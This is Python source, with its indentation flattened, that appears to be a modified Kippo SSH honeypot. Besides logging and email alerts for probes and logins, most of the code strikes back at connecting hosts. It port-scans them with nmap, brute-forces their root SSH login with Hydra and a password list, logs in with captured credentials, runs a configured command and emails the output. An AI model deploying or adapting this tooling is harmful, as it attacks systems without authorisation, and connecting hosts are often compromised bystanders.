def loginThread(self):
client = SSHClient()
client.set_missing_host_key_policy(AutoAddPolicy())
loginDetailString = self.username + "@" + self.clientip +" (" + self.password + ")"
print "Attempting login with", loginDetailString
try:
client.connect(hostname=self.clientip, username=self.username, password=self.password)
except:
print "Authentication failed for", loginDetailString
return
sendEmail('New login success!',
"Successfully logged in to remote box: " + loginDetailString)
configName = "not_root_command"
if (self.username == "root"):
configName = "root_command"
command = config().get('dirtybastard', configName)[1:-1] # Remove quotes
print "SUCCESS! Running command: " + command
stdin, stdout, stderr = client.exec_command(command)
print "stdout:"
stdoutString = ""
for line in stdout.readlines():
print line.strip()
stdoutString = stdoutString + line.strip() + "\n"
sendEmail('Output from command',
"stdout:\n" + stdoutString);
def checkUserPass(self, username, password):
cfg = config()
if UserDB().checklogin(username, password):
print 'login attempt [%s/%s] succeeded' % (username, password)
if cfg.has_option('smtp', 'alert_login'):
if cfg.get('smtp', 'alert_login') == 'true':
print 'Emailing about login notification (alert_login = true).'
emailMessage = 'There was a succesfully login (%s/%s).' % (username, password)
sendEmail('SSH Succesful Login', emailMessage)
return True
else:
print 'login attempt [%s/%s] failed' % (username, password)
return False
def connectionLost(self, reason):
cfg = config()
for i in self.interactors:
i.sessionClosed()
if self.transport.sessionno in self.factory.sessions:
del self.factory.sessions[self.transport.sessionno]
self.lastlogExit()
if self.ttylog_open:
ttylog.ttylog_close(self.ttylog_file, time.time())
self.ttylog_open = False
if cfg.has_option('smtp', 'alert_quit'):
if cfg.get('smtp', 'alert_quit') == 'true':
print 'Emailing about attack being over (alert_quit = true).'
emailMessage = 'The attacker quit.\n\nPlease check the logs (%s)!' % (self.ttylog_file)
sendEmail('SSH Attack Finished', emailMessage)
transport.SSHServerTransport.connectionLost(self, reason)
def connectionMade(self):
cfg = config()
print 'New connection: %s:%s (%s:%s) [session: %d]' % \
(self.transport.getPeer().host, self.transport.getPeer().port,
self.transport.getHost().host, self.transport.getHost().port,
self.transport.sessionno)
self.interactors = []
self.logintime = time.time()
self.ttylog_open = False
if cfg.has_option('smtp', 'alert_probe'):
if cfg.get('smtp', 'alert_probe') == 'true':
print 'Emailing about SSH probe (alert_probe = true).'
emailMessage = 'There was an SSH probe request.\nFrom: %s:%s.\nTo: %s:%s.\nKippo Session: %s.' % \
(self.transport.getPeer().host, self.transport.getPeer().port,
self.transport.getHost().host, self.transport.getHost().port,
self.transport.sessionno)
sendEmail('SSH Probe', emailMessage)
transport.SSHServerTransport.connectionMade(self)
def scanThread(self):
nm = nmap.PortScanner()
nmapArgs = config().get("dirtybastard", "nmap_args")[1:-1] # Remove quotes
print "Running portscan at %s with arguments: %s" % (self.clientip, nmapArgs)
try:
r = nm.scan(self.clientip, arguments=nmapArgs)
except nmap.PortScannerError:
print "!!! PortScan error. Did you request a scan type that requires root?"
return
openTcpPorts = []
openUdpPorts = []
try:
for port in nm[self.clientip]["tcp"].keys():
openTcpPorts.append(port)
except KeyError:
pass
try:
for port in nm[self.clientip]["udp"].keys():
openUdpPorts.append(port)
except KeyError:
pass
resultsString = ""
for port in openTcpPorts:
resultsString += "TCP Port open: %s\n" % (port)
portInfo = nm[self.clientip]["tcp"][port]
for key in portInfo:
resultsString += "\t - %s: %s\n" % (key, portInfo[key])
for port in openUdpPorts:
resultsString += "UDP Port open: %s\n" % (port)
portInfo = nm[self.clientip]["udp"][port]
for key in portInfo:
resultsString += "\t - %s: %s\n" % (key, portInfo[key])
print resultsString
sendEmail("Port scan results " + self.clientip, resultsString)
def bruteforceThread(self):
print "Launching Hydra at %s." % (self.clientip)
cfg = config()
hydraLocation = cfg.get('dirtybastard', 'hydra_location')
listLocation = cfg.get('dirtybastard', 'password_list')
if not self.validFiles(hydraLocation, listLocation):
return
cmd = [hydraLocation, self.clientip, "ssh", "-l", "root", "-P" , listLocation]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
out, err = p.communicate()
print "Hydra complete (%s)." % (self.clientip)
print "stdout:", out
sendEmail('Hydra results ' + self.clientip, out)
def loginSuccess(self, username, password):
logLine = 'login attempt [%s/%s] succeeded' % (username, password)
print logLine
sendEmail('New attacker', logLine)
